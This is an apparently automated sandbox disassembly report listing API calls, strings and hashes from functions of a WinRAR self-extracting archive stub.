  • Part of subcall function 008BAC16: OleInitialize.OLE32(00000000), ref: 008BAC2F
  • Part of subcall function 008BAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008BAC66
  • Part of subcall function 008BAC16: SHGetMalloc.SHELL32(008E8438), ref: 008BAC70
• GetCommandLineW.KERNEL32 ref: 008BDF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 008BDF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 008BDF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 008BDFCE
  • Part of subcall function 008BDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008BDBF4
  • Part of subcall function 008BDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008BDC30
• CloseHandle.KERNEL32(00000000), ref: 008BDFD7
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,008FEC90,00000800), ref: 008BDFF2
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,008FEC90), ref: 008BDFFE
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 008BE009
                                                                                                                                  • _swprintf.LIBCMT ref: 008BE048
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 008BE05A
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 008BE061
                                                                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 008BE078
                                                                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 008BE0C9
                                                                                                                                  • Sleep.KERNEL32(?), ref: 008BE0F7
                                                                                                                                  • DeleteObject.GDI32 ref: 008BE130
                                                                                                                                  • DeleteObject.GDI32(?), ref: 008BE140
                                                                                                                                  • CloseHandle.KERNEL32 ref: 008BE183
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                  • API String ID: 3049964643-3743209390

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 812 8ba6c2-8ba6df FindResourceW 813 8ba7db 812->813 814 8ba6e5-8ba6f6 SizeofResource 812->814 815 8ba7dd-8ba7e1 813->815 814->813 816 8ba6fc-8ba70b LoadResource 814->816 816->813 817 8ba711-8ba71c LockResource 816->817 817->813 818 8ba722-8ba737 GlobalAlloc 817->818 819 8ba73d-8ba746 GlobalLock 818->819 820 8ba7d3-8ba7d9 818->820 821 8ba7cc-8ba7cd GlobalFree 819->821 822 8ba74c-8ba76a call 8c0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 8ba76c-8ba78e call 8ba626 822->825 826 8ba7c5-8ba7c6 GlobalUnlock 822->826 825->826 831 8ba790-8ba798 825->831 826->821 832 8ba79a-8ba7ae GdipCreateHBITMAPFromBitmap 831->832 833 8ba7b3-8ba7c1 831->833 832->833 834 8ba7b0 832->834 833->826 834->833
                                                                                                                                  APIs
                                                                                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,008BB73D,00000066), ref: 008BA6D5
                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA6EC
                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA703
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA712
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,008BB73D,00000066), ref: 008BA72D
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 008BA73E
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008BA762
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 008BA7C6
                                                                                                                                    • Part of subcall function 008BA626: GdipAlloc.GDIPLUS(00000010), ref: 008BA62C
                                                                                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008BA7A7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 008BA7CD
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                  • String ID: PNG
                                                                                                                                  • API String ID: 211097158-364855578

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1029 8aa69b-8aa6bf call 8bec50 1032 8aa6c1-8aa6ce FindFirstFileW 1029->1032 1033 8aa727-8aa730 FindNextFileW 1029->1033 1034 8aa742-8aa7ff call 8b0602 call 8ac310 call 8b15da * 3 1032->1034 1036 8aa6d0-8aa6e2 call 8abb03 1032->1036 1033->1034 1035 8aa732-8aa740 GetLastError 1033->1035 1040 8aa804-8aa811 1034->1040 1037 8aa719-8aa722 1035->1037 1044 8aa6fe-8aa707 GetLastError 1036->1044 1045 8aa6e4-8aa6fc FindFirstFileW 1036->1045 1037->1040 1047 8aa709-8aa70c 1044->1047 1048 8aa717 1044->1048 1045->1034 1045->1044 1047->1048 1050 8aa70e-8aa711 1047->1050 1048->1037 1050->1048 1052 8aa713-8aa715 1050->1052 1052->1037
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6C4
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6F2
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6FE
                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA728
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008AA592,000000FF,?,?), ref: 008AA734
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 42610566-0
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002,00000000), ref: 008C7E0F
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002,00000000), ref: 008C7E16
                                                                                                                                  • ExitProcess.KERNEL32 ref: 008C7E28
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008BB7E5
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BB8D1
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB8EF
                                                                                                                                  • IsDialogMessageW.USER32(?,?), ref: 008BB902
                                                                                                                                  • TranslateMessage.USER32(?), ref: 008BB910
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 008BB91A
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 008BB93D
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 008BB960
                                                                                                                                  • GetDlgItem.USER32(?,00000068), ref: 008BB983
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008BB99E
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,008D35F4), ref: 008BB9B1
                                                                                                                                    • Part of subcall function 008BD453: _wcslen.LIBCMT ref: 008BD47D
                                                                                                                                  • SetFocus.USER32(00000000), ref: 008BB9B8
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBA24
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                    • Part of subcall function 008BD4D4: GetDlgItem.USER32(00000068,008FFCB8), ref: 008BD4E8
                                                                                                                                    • Part of subcall function 008BD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,008BAF07,00000001,?,?,008BB7B9,008D506C,008FFCB8,008FFCB8,00001000,00000000,00000000), ref: 008BD510
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008BD51B
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000C2,00000000,008D35F4), ref: 008BD529
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD53F
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008BD559
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD59D
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008BD5AB
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD5BA
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD5E1
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000C2,00000000,008D43F4), ref: 008BD5F0
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 008BBA68
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 008BBA90
                                                                                                                                  • GetTickCount.KERNEL32 ref: 008BBAAE
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBAC2
                                                                                                                                  • GetLastError.KERNEL32(?,00000011), ref: 008BBAF4
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 008BBB43
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBB7C
                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 008BBBD0
                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 008BBBEA
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 008BBC47
                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 008BBC6F
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 008BBCB9
                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 008BBCE2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008BBCEB
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBD1E
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BBD7D
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000065,008D35F4), ref: 008BBD94
                                                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 008BBD9D
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 008BBDAC
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008BBDBB
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BBE68
                                                                                                                                  • _wcslen.LIBCMT ref: 008BBEBE
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBEE8
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 008BBF32
                                                                                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 008BBF4C
                                                                                                                                  • GetDlgItem.USER32(?,00000068), ref: 008BBF55
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 008BBF6B
                                                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 008BBF85
                                                                                                                                  • SetWindowTextW.USER32(00000000,008EA472), ref: 008BBFA7
                                                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 008BC007
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BC01A
                                                                                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 008BC0BD
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 008BC197
                                                                                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 008BC1D9
                                                                                                                                    • Part of subcall function 008BC73F: __EH_prolog.LIBCMT ref: 008BC744
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BC1FD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                  • API String ID: 3445078344-2238251102
                                                                                                                                  • Opcode ID: c2ce3f90a2b819a34176e70e0f9df4e2cf92379ef5d8fa1e823d0f6ae6e45526
                                                                                                                                  • Instruction ID: f8a1e1282cb55907b4ba7cfde6f166223b514557aa5568184bcd9bde010a96b7
                                                                                                                                  • Opcode Fuzzy Hash: c2ce3f90a2b819a34176e70e0f9df4e2cf92379ef5d8fa1e823d0f6ae6e45526
                                                                                                                                  • Instruction Fuzzy Hash: 0942D871944258BEEB219BB49C4AFFE3B7CFB02704F004155F645E62E2CBB49A44CB66

                                                                                                                                  Control-flow Graph

                                                                                                                                  [Control-flow graph for the function at 8b0863; graph rendering not preserved. Legend: Executed / Not Executed]
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 008B087C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008B088E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008B08BF
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008B0B69
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B0B83
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B0B93
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,008D3C7C,00000000), ref: 008B0BB1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008B0C09
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008B0C1E
                                                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008D3C7C,?,00000000,?,00000800), ref: 008B0C72
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,008D3C7C,00000800,?,00000000,?,00000800), ref: 008B0C9C
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,008D3D44,00000800), ref: 008B0CD8
                                                                                                                                    • Part of subcall function 008B081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                    • Part of subcall function 008B081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  • _swprintf.LIBCMT ref: 008B0D4A
                                                                                                                                  • _swprintf.LIBCMT ref: 008B0D96
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • AllocConsole.KERNEL32 ref: 008B0D9E
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 008B0DA8
                                                                                                                                  • AttachConsole.KERNEL32(00000000), ref: 008B0DAF
                                                                                                                                  • _wcslen.LIBCMT ref: 008B0DC4
                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008B0DD5
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 008B0DDC
                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 008B0DE7
                                                                                                                                  • FreeConsole.KERNEL32 ref: 008B0DED
                                                                                                                                  • ExitProcess.KERNEL32 ref: 008B0DF5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                  • API String ID: 1207345701-3298887752
                                                                                                                                  • Opcode ID: cbf81a1cd99b0892f42f02901f0bd94a9c26cd29b172bea6de893077da2983a7
                                                                                                                                  • Instruction ID: 4c5f7410feecd2297c1f164e107710d76b171a4efa1c6e59d64a605a240c1495
                                                                                                                                  • Opcode Fuzzy Hash: cbf81a1cd99b0892f42f02901f0bd94a9c26cd29b172bea6de893077da2983a7
                                                                                                                                  • Instruction Fuzzy Hash: 7DD140B1009784ABD7219F948849ADFBBE8FB85704F504A1EF295D6350DBB48A4CCF63

                                                                                                                                  Control-flow Graph

                                                                                                                                  [Control-flow graph for the function at 8bc73f; graph rendering not preserved. Legend: Executed / Not Executed]
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008BC744
                                                                                                                                    • Part of subcall function 008BB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008BB3FB
                                                                                                                                  • _wcslen.LIBCMT ref: 008BCA0A
                                                                                                                                  • _wcslen.LIBCMT ref: 008BCA13
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 008BCA71
                                                                                                                                  • _wcslen.LIBCMT ref: 008BCAB3
                                                                                                                                  • _wcsrchr.LIBVCRUNTIME ref: 008BCBFB
                                                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 008BCC36
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 008BCC46
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,008EA472), ref: 008BCC54
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008BCC7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                  • API String ID: 2804936435-312220925
                                                                                                                                  • Opcode ID: 3de27f76d1bdeda49c2f91db4f444c20572097a247398d9d6b2c2196c232ad8e
                                                                                                                                  • Instruction ID: 16cea80422ebf23296cdccb2d573cb15a8ccee8cbd4641a1bb366589964508d2
                                                                                                                                  • Opcode Fuzzy Hash: 3de27f76d1bdeda49c2f91db4f444c20572097a247398d9d6b2c2196c232ad8e
                                                                                                                                  • Instruction Fuzzy Hash: BFE163B2900219AADF25DBA4DC85EEE77BCFB05350F4081A6F609E3251EF749E448F61
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008ADA70
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008ADAAC
                                                                                                                                    • Part of subcall function 008AC29A: _wcslen.LIBCMT ref: 008AC2A2
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                    • Part of subcall function 008B1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008ABAE9,00000000,?,?,?,00010424), ref: 008B1BA0
                                                                                                                                  • _wcslen.LIBCMT ref: 008ADDE9
                                                                                                                                  • __fprintf_l.LIBCMT ref: 008ADF1C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                  • API String ID: 566448164-801612888
                                                                                                                                  • Opcode ID: 5460b32fd6fedde642be8a3187c442e80a42c55265cc42adea2d2d5fac413f6e
                                                                                                                                  • Instruction ID: 8f7dcda0a7f0f33e572b5af62335de3b065a0d82772c39bd7b5b367201f80373
                                                                                                                                  • Opcode Fuzzy Hash: 5460b32fd6fedde642be8a3187c442e80a42c55265cc42adea2d2d5fac413f6e
                                                                                                                                  • Instruction Fuzzy Hash: 6F32E071900218ABEF24EF68C841BEA77B4FF16314F40452AF906DBA81EBB1D985CB51

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008BB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                    • Part of subcall function 008BB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                    • Part of subcall function 008BB568: IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                    • Part of subcall function 008BB568: TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                    • Part of subcall function 008BB568: DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  • GetDlgItem.USER32(00000068,008FFCB8), ref: 008BD4E8
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,008BAF07,00000001,?,?,008BB7B9,008D506C,008FFCB8,008FFCB8,00001000,00000000,00000000), ref: 008BD510
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008BD51B
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,008D35F4), ref: 008BD529
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD53F
                                                                                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008BD559
                                                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD59D
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008BD5AB
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD5BA
                                                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD5E1
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,008D43F4), ref: 008BD5F0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
